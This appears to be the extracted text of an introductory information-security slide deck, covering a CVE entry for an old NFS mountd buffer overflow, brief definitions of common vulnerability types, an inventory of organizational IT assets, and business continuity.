Professional Documents
Culture Documents
Security
SECURITY VULNERABILITY AND RISK
Threat and vulnerability
VULNREBILITY
Name: CVE-1999-0002
Status: Entry
Reference: BID:121
Reference: URL:http://www.securityfocus.com/bid/121
Reference: CERT:CA-98.12.mountd
Reference: CIAC:J-006
Reference: URL:http://www.ciac.org/ciac/bulletins/j-006.shtml
Reference: SGI:19981006-01-I
Reference:
URL:ftp://patches.sgi.com/support/free/security/advisories/19981
006-01-I
Reference: XF:linux-mountd-bo
Buffer overflow in NFS mountd gives root access to remote
attackers, mostly in Linux systems.
Common Vulnerability Scoring System
Unrestricted upload
The unrestricted uploads vulnerability occurs when files are accepted by software
without verifying that the fi le follows strict specifications .
It is possible for an attacker to upload software programs to the site instead of
images
Cross-site Scripting
occurs when user-supplied input is used without verifi cation as part of the output
served to other users
Software vulnerability
Buffer overflow
refers to the situation where a program puts more data into a storage location than it can hold
Missing Authorization
happens when a software program allows users access to privileged parts of the program
without verifying the credentials of the user.
Unencrypted data
occurs when sensitive data is stored locally or transmitted over a network without proper
encryption
Procedural vulnerability
https://www.youtube.com/watch?v=opRMrEfAIiI
Information security
Business survival depends on information security.
PROCESSES
TECHNOLOGY
People (Who we are)
Request fulfillment
Access management
Identitymanagement
Service Level / Third-party Services Management
IT procurement process etc...
Technology (What we use to improved
what we do)
Network Infrastructure:
Cabling, Data/Voice Networks and equipment
Telecommunications services (PABX), including VoIP services , ISDN ,
Video Conferencing
Server computers and associated storage devices
Operating software for server computers
Communications equipment and related hardware.
Intranet and Internet connections
VPNs and Virtual environments
Remote access services
Wireless connectivity
Technology (What we use to improved
what we do)
Application software:
Finance and assets systems, including Accounting packages, Inventory
management, HR systems, Assessment and reporting systems
Software as a service (Sass) - instead of software as a packaged or custom-
made product. Etc..
Physical Security components:
CCTV Cameras
Clock in systems / Biometrics
Environmental management Systems: Humidity Control, Ventilation , Air
Conditioning, Fire Control systems
Electricity / Power backup
Technology (What we use to improved
what we do)
Access devices:
Desktop computers
Laptops, ultra-mobile laptops and PDAs Thin client computing.
Digital cameras, Printers, Scanners, Photocopier etc.
Organizational security
LOSS OF GOODWILL
• Information Security is “Organizational Problem” rather
than “IT Problem”
• More than 70% of Threats are Internal
Flood.
Cyber attack.
Supply chain failure or losing a key employee.
Disruptions to your business can happen at any moment.
Business continuity is about having a plan to deal with difficult situations, so your
organization can continue to function with as little disruption as possible.
Whether it’s a business, public sector organization, or charity, you need to know
how you can keep going under any circumstances.
Group Discussion